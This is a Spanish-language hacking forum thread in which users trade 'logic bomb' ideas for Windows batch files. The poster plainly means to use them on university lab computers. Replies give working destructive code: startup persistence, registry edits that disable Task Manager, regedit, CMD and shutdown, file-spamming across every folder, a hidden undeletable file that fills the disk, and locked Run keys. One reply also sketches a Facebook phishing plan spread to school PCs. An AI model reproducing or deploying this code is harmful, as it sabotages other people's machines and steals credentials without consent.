 Autor
|
Tema: Busco ideas de Bomba lógica para windows (Leído 11,856 veces)
|
dato000
 Desconectado
Mensajes: 3.034
|
Hey buenas, Esta pregunta va para los maestros: Ya vi virulator y IceCrack de su eminencia Elecktro-Hacker, y viendo una y otras cosas "comicas y raras", me dejaron como proyecto hacer una bomba lógica. No es la gran cosa, pero de momento, solo se me ha ocurrido hacer una inocencia: Un script que me abra unas diez mil veces (10.000) mspaint.exe, y mientras satura la memoria abriendo el programa una y otra y otra y otra vez, dar la orden de reinicio de sistema, sin que el usuario se percate de la orden, como dije, una inocentada, y que este proceso se repita tan pronto se inicie sesión se corra el código, como cuando uno abre un correo o un mensaje de msn (JA a mi me paso!!)El problema no es el código, el problema, es, que consejos me pueden brindar uds, señoras y señoritas???? Vi que en la universidad, hay un archivo que abre encuestas para los que dan soporte en las salas informatica, ya saben, si es buen servicio bla bla bla. Ya redireccione uno, ja! a una página de porno ja!, me imagino la cara de uno de esos pobres que le dio la curiosidad de ver ese ejectuable en el sistema. Pero no es la gran cosa, pero supongo que podria inventarme algo nuevo. Necesito sugerencias, que se puede hacer con un batch de windows???? No soy el experto, pero pues, tengo tiempo que matar. es para fines investigativos, tengo que hacer ensayo y todo XDDDDDD claro que lo hare como ensayo 
|
|
|
|
« Última modificación: 16 Septiembre 2012, 19:56 pm por dato000 »
|
En línea
|
|
|
|
Eleкtro
Ex-Staff
Desconectado
Mensajes: 9.866
|
Un script que me abra unas diez mil veces (10.000) mspaint.exe, y mientras satura la memoria abriendo el programa una y otra y otra y otra vez, dar la orden de reinicio de sistema, sin que el usuario se percate de la orden, como dije, una inocentada, y que este proceso se repita tan pronto se inicie sesión se corra el código 10.000? te pasaste xDDDD REM Ya sabes que esto puedes hacerlo también por el registro de Windows si prefieres... If Not Exist " %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ %~nx0" (Copy %0 " %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" >NUL) REM La orden de reiniciar. REM Repetirla es tonteria, Porque queda nula (No anulada) REM 10.000 veces... xD For /L %%a in (0,1,10000 ) Do (Start /B mspaint )
como cuando uno abre un correo o un mensaje de msn Batch + Vbscript (WMI) o Tasklist.exe, Para monitorizar el nombre de las ventanas (La de correo y la de los mensajes)... O por el nombre del proceso, Aunque menos eficiente: :Loop wmic process where name="msn.exe" call terminate | Find "terminate" >NUL && ( start codigo malicioso xD ) || ( )
No puedes hacer gran cosa en Batch... Yo estoy harto de ver códigos que hacen siempre lo mismo, unos mejores, y otros peores, pero siempre lo mismo. EDITO: Si quieres joder un poco, llena el escritorio con 10.000 archivos y deniega los privilegios de eliminación de los archivos al usuario... el inicio se vuelve lentisimo xD O agrega una clave al inicio para visitar una página porno gay y luego deniega los permisos a esa clave usando "regini" (No se si está en WinXP), si necesitas un ejemplo de regini pide, tengo alguno por ahi. mucha gente no sabe cambiar los permisos en el registro xD. EDITO 2: Se me ocurre una cosa: 1º - Bájate el "phiser creator" si no sabes php, haz una réplica del login de facebook, la subes a un hosting. 2º - un simple bat que se añada al inicio y ejecute el navegador + tu página de phising 3º - Distribuir la bomba por los pcs del instituto y esperar a que caigan como moscas.  4º - Todo esto, únicamente con fines educativos, luego borrar las contraseñas xD. Una vez hice un code "inocente" para salir de la rutina, por si te sirve: (PD: LA última parte, El Dummy) ::::::::::::::::::::::::: : Spank Me! 1.0 : : : By EleKtrO H@ckeR : : : : Testeado en Windows 7 : ::::::::::::::::::::::::: Spank Me! (Bitch) Nivel destructivo: 3/10 - Deshabilita componentes del sistema operativo. - Genera archivos de 1 byte con nombre aleatorio por todas las carpetas dle disco duro. 100 archivos por cada carpeta. - Genera un archivo vacío (Dummy) consumiendo todo el espacio libre del disco duro. REM: Deshabilita la ejecución de archivos REG reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg" /t Reg_SZ /d "txtfile" /f >NUL 2 >&1 FOR /F "tokens=*" %%a in ('Reg query "HKEY_USERS" /f - ^| findstr /r .-......- ^| find /v "Classes"' ) do ( REM: Deshabilita el acceso a todas las aplicaciones (Inicio > Ejecutar) reg add " %%a\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /T "REG_DWORD" /D "1" /f >NUL 2 >&1 REM: Deshabilita el administrador de tareas reg add " %%a\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >NUL 2 >&1 REM: Deshabilita el apagado del PC reg add " %%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoClose" /T "REG_DWORD" /D "1" /f >NUL 2 >&1 REM: Deshabilita el cambio de usuario de sesión del PC reg add " %%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "StartmenuLogoff" /T "REG_DWORD" /D "1" /f >NUL 2 >&1 REM: Deshabilita el menú contextual del ratón reg add " %%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoViewContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2 >&1 REM: Deshabilita el menú contextual del menú inicio reg add " %%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoTrayContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2 >&1 REM: Deshabilita modificaciones en el menú inicio reg add " %%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoChangeStartMenu" /T "REG_DWORD" /D "1" /f >NUL 2 >&1 REM: Deshabilita el panel de control reg add " %%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoControlPanel" /T "REG_DWORD" /D "1" /f >NUL 2 >&1 REM: Deshabilita el regedit reg add " %%a\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableRegistryTools" /T "REG_DWORD" /D "1" /f >NUL 2 >&1 REM: Deshabilita la consola de windows reg add " %%a\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /T "REG_DWORD" /D "2" /f >NUL 2 >&1 ) REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: REM: Crea archivos de 1 byte, Con nombre aleatorio, En todos los directorios del disco duro REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: For /F "Tokens=*" %%@ in (' Dir /B /S /AD " %systemdrive%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"' ) do (Call : COPY %%@) Fsutil file createnew " %*\ %Random%%Random%%Random%%Random%%Random%" 1 >NUL 2 >&1 REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: REM: Crea un archivo "dummy" consumiendo TODO el espacio libre del disco duro. REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :DUMMY REM: Permisos Takeown /F " %Windir%\winsxs" >NUL 2 >&1 Icacls " %Windir%\winsxs" /Grant TODOS:F >NUL 2 >&1 REM Crear el Dummy For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%' ) do ( Fsutil file createnew " %WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2 >&1 ) REM Protección Anti-Borrado Takeown /F " %WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2 >&1 Icacls " %WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2 >&1 Attrib " %WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2 >&1 Icacls " %WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:F >NUL 2 >&1 :FIN
|
|
|
|
« Última modificación: 16 Septiembre 2012, 20:43 pm por EleKtro H@cker »
|
En línea
|
|
|
|
dato000
Desconectado
Mensajes: 3.034
|
 Esto es material de oro!!! Voy a crearme una imagen win7 ahora mismo y pruebo, naaaa lo mio es de lamers comparado con esto. 10.000? te pasaste xDDDD
Muy poco?? XDDDDDDD aunque, solo era una idea, pero seria aburrido un copy-pate de solo "start mspaint". Tu orden esta mejor, como dije, soy un novato en batch, pero es que es universal, jajaj me encanta porque no tengo que poner compilador ni un ide jajaj. Voy a educar a los computadores de la universidad, ajajajaja REM Ya sabes que esto puedes hacerlo también por el registro de Windows si prefieres... If Not Exist " %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ %~nx0" (Copy %0 " %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" >NUL) REM La orden de reiniciar. REM Repetirla es tonteria, Porque queda nula (No anulada) REM 10.000 veces... xD For /L %%a in (0,1,10000 ) Do (Start /B mspaint )
ahhh así se hace un bucle elegante, ummm es como en python, lo cual me recuerda que no se absolutamente nada de python, y menos de batch XDDDD. Viejo por registro no sabria hacerlo, además hay 2 cosas: 1) El cuento es que sea .bat, un .reg pensaran que me lo copie XDDD 2) Para la prueba podre ser admin, pero si voy a las grandes ligas (los computadores de las salas) ya sere como invitado, y no quiero reventar la cuenta de admin porque ahi me meteria en problemas, por lo que una cuenta de invitado me queda muy limitada. Aún estoy buscando una forma (sin pagar software) de encontrar la clave root de esas salas. Que bonito seria, abrir una imagen de un pirata o algo asi diciendo que se jodio la maquina y que van a llamar a la ciberpolicia, con música de malos!!! voy a crearme una imagen y dejo el batch para que me digan lo malo y lo malo que tieneBatch + Vbscript (WMI) o Tasklist.exe, Para monitorizar el nombre de las ventanas (La de correo y la de los mensajes)... O por el nombre del proceso, Aunque menos eficiente: :Loop wmic process where name="msn.exe" call terminate | Find "terminate" >NUL && ( start codigo malicioso xD ) || ( )
No puedes hacer gran cosa en Batch... Yo estoy harto de ver códigos que hacen siempre lo mismo, unos mejores, y otros peores, pero siempre lo mismo. Que clase de códigos????' EDITO: Si quieres joder un poco, llena el escritorio con 10.000 archivos y deniega los privilegios de eliminación de los archivos al usuario... el inicio se vuelve lentisimo xD
NO estoy seguro de entender eso, pero suena a sabor!!!! O agrega una clave al inicio para visitar una página porno gay y luego deniega los permisos a esa clave usando "regini" (No se si está en WinXP), si necesitas un ejemplo de regini pide, tengo alguno por ahi. mucha gente no sabe cambiar los permisos en el registro xD.
EJEMPLO POR FAVOR SENSEI!!!!la página porno la redireccione pero a "x v i d e o s" jejejejejejejjjeje es de todo un poco, porno del bueno ajjajaajja, sali corriendo al hacer esto, pero ahora lo haria sin miedo, aunque quisiera hacerlo en todas las maquinas XDDD, voy a comprobar si sirve putty jajajaj porque se que como invitado no puedo configurar redes, sigo en la busqueda de la clave maestra. Yo no se cambiar cosas del registro, pero si es como lo de la flechita de los iconos que dejaste hace tiempo, aprenderia encantado YEAH. EDITO 2: Se me ocurre una cosa: 1º - Bájate el "phiser creator" si no sabes php, haz una réplica del login de facebook, la subes a un hosting. 2º - un simple bat que se añada al inicio y ejecute el navegador + tu página de phising 3º - Distribuir la bomba por los pcs del instituto y esperar a que caigan como moscas. 4º - Todo esto, únicamente con fines educativos, luego borrar las contraseñas xD. Una vez hice un code "inocente" para salir de la rutina, por si te sirve: (PD: LA última parte, El Dummy) Te entiendo bastante, se me haria complicado implementar el formulario, porque me rastrearian facilmente, pero no serviria para facebook, porque el proxy de la universidad (phenix, que lindo nombre para esa porqueria de proxy, que ni lo escriben bien los hijos de...) aunque se salta facil con tor, pero nadie conoce tor allá, --malditos lamers--... no permite el acceso a facebook, así que es perder el tiempo, pero con ese cuento dejaste, jejejejeje ya me dieron ganas de aprender phishing y ensayarlo, aunque no se como moldear el css para que quede parecido a facebook, pero LO VOY A INTENTAR!!! Voy a hacer de este un mundo peor!! y lo comentare por aqui XDD El dummy, lo voy a probar tan pronto instale el win7 virtual XDDDDD todos alla en la universidad usan win7.
|
|
|
|
|
En línea
|
|
|
|
Eleкtro
Ex-Staff
Desconectado
Mensajes: 9.866
|
Que bonito seria, abrir una imagen de un pirata o algo asi diciendo que se jodio la maquina y que van a llamar a la ciberpolicia, con música de malos!!! voy a crearme una imagen y dejo el batch para que me digan lo malo y lo malo que tiene Poder se puede, Pero a menos que "compiles" en un exe el archivo.bat y la utilidad Nircmd.exe junto a la imagen.bmp y el archivo.wav... Pero si dices que lo quieres tener en un único archivo "bat" pues... 
Que clase de códigos????' Siempre lo mismo... 
NO estoy seguro de entender eso, pero suena a sabor!!!! Ejemplo: PUSHD " %userprofile%\Desktop\" For /L %%# in (0,1, %CANTIDAD%) Do ( CLS Set "FILE=Pornotube !RANDOM!!RANDOM!.url" ATTRIB +R +S "!FILE!" ICACLS " !FILE!" /DENY "TODOS": (F ^) >NUL) REM VACUNA: REM REM @Echo OFF REM PUSHD "%userprofile%\Desktop\" REM TAKEOWN /F "*.url" >NUL REM ICACLS "*.url" /GRANT "TODOS":(F) >NUL REM ATTRIB -R -S "*.url" REM DEL "*.url" REM Pause REM Exit
 PD: Solamente me referia a llenar el escritorio con miles de archivos, Que acaban bugeando el explorer.exe y hay que matar el proceso. Pero lo que tiene gracia es que no se pueden eliminar los archivos a menos que vuelvas a darle permisos para eliminación... La verdad, como putada broma pesada está bien porque es algo muy molesto, te quita 10 minutos de vida para abrir una carpeta en el explorer, o para abrir la consola para ejecutar la vacuna xD
EJEMPLO POR FAVOR SENSEI!!!! EJEMPLO (REGINI): REM Elektro H@cker :: Inicia una página en el navegador por defecto al iniciar sesión en Windows Set "KeyADD=Elektro H @cker" SET "WEB=www.elhacker.net" REM Obtenemos el navegador por defecto FOR /F tokens ^=2 ^ delims ^=^" %%@ in ('REG QUERY HKCR\htmlfile\shell\open\command /VE' ) Do (REM " REM Agregamos la página al inicio de sesión del usuario REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V " %KeyADD%" /D "CMD /C \"Start /D \" %%~dp @" %%~nx @ \" %WEB%\""" /F >NUL) REM Eliminamos los permisos usando REGINI Echo HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run [2 8 12 18 19 22] >" %TEMP%\deny.txt" Regini.exe "%TEMP%\deny.txt REM VACUNA REM REM @echo off REM Set "KeyDEL=Elektro H@cker" REM Echo HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run [1 5 7 11 14 17 20]>"%TEMP%\grant.txt" REM Regini.exe "%TEMP%\grant.txt" REM REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "%KeyDEL%" /F REM Pause&Exit
 Saludos.
|
|
|
|
« Última modificación: 17 Septiembre 2012, 01:38 am por EleKtro H@cker »
|
En línea
|
|
|
|
Geormarsch
Desconectado
Mensajes: 160
|
Recuerdo que yo hice un pishing creattt en batch del facebook, descargaba el index del facebook y otro archivo php y luego te pedia tus datos ftp y los subia a tu web
|
|
|
|
|
En línea
|
"Comentar el código es como limpiar el cuarto de baño; nadie quiere hacerlo, pero el resultado es siempre una experiencia más agradable para uno mismo y sus invitados"
|
|
|
dato000
Desconectado
Mensajes: 3.034
|
Ummm yo aún sigo de novato, no entiendo bien los ciclos en batch. Digamos aún sigo con lo de digamos, abrir 5 veces paint: :paint
start /b "mspaint.exe"
start /b "mspaint.exe"
start /b "mspaint.exe"
start /b "mspaint.exe"
start /b "mspaint.exe"
goto paint
He mirado los programas que has dejado para recuparar contraseñas, el de navegadores, el de ftp... se entiende facilmente el funcionamiento. Pero hay cosas muy complejas (como lo del batch de matrix, jeje muy bueno me hizo mucha gracia cuando lo hice fullscreen) y no estoy a la altura (aún) para hacer un código muy bueno, me sale como tu mismo los desprecias Del /Q /S C:\*
Tengo una duda, ese batch para rellenar completamente el disco: REM Ocupar todo el espacio del disco duro con un archivo dummy
Setlocal enabledelayedexpansion
Takeown /F "%Windir%\winsxs" >NUL 2>&1
Icacls "%Windir%\winsxs" /Grant TODOS:F >NUL 2>&1
:Dummy
For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
Set Size=%%f
Set Size=!Size:~-0,-6!
Set Size=!Size!000000
Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1
)
Setlocal disabledelayedexpansion
:AntiDelete
Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2>&1
Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:F >NUL 2>&1
Funciona perfectamente, pero es posible arreglarlo desde cmd?? o solo con formateo (yo formatee ayer el win7 virtual XDDDD, si, me quedo grande, lo siento, soy humano) porque pues un disco lleno no me conviene jaja para seguir haciendo ensayos :: Te felicito maestro, Que tiemble tú victima... Muahaha!! :W XDDDDDD   |
|
|
|
|
En línea
|
|
|
|
Eleкtro
Ex-Staff
Desconectado
Mensajes: 9.866
|
Tengo una duda, ese batch para rellenar completamente el disco:
es posible arreglarlo desde cmd??
Claro ::Vacuna DUMMY Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" -H -S -R Del " %WINDIR%\winsxs\Microsoft Security Database.msd"
saludos
|
|
|
|
|
En línea
|
|
|
|
dato000
Desconectado
Mensajes: 3.034
|
jejej encontre esto: http://pastebin.com/SPNJWtwqcreditos??? gracias por la respuesta, voy a implementarlo. Oye, como manejas los ciclos, que la ayuda que me echa windows y los blogs no me queda claro. Como se trabajan los ciclos for en batch?? |
|
|
|
|
En línea
|
|
|
|
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
ideas para crear un programa que cambie las claves de windows
Programación Visual Basic
|
Roy-Mustang
|
6
|
3,561
|
7 Diciembre 2012, 02:12 am
por Roy-Mustang
|
|
|
|
La basura electrónica es una bomba ecológica para el planeta, según la ONU
Noticias
|
wolfbcn
|
1
|
1,779
|
3 Noviembre 2014, 01:18 am
por B€T€B€
|
|
|
Busco actviador para windows 10
Windows
|
RiasChan
|
1
|
2,320
|
16 Junio 2016, 20:44 pm
por Songoku
|
|
|
|
AYUDA Crear Bomba logica para enviar SPAM
Análisis y Diseño de Malware
|
D4v1d345
|
1
|
2,582
|
11 Abril 2019, 18:45 pm
por Machacador
|
|
|
|
Creación de una bomba lógica
Análisis y Diseño de Malware
|
Excalibur Matrix
|
2
|
26,827
|
25 Octubre 2021, 11:46 am
por Usuario887
|
 |
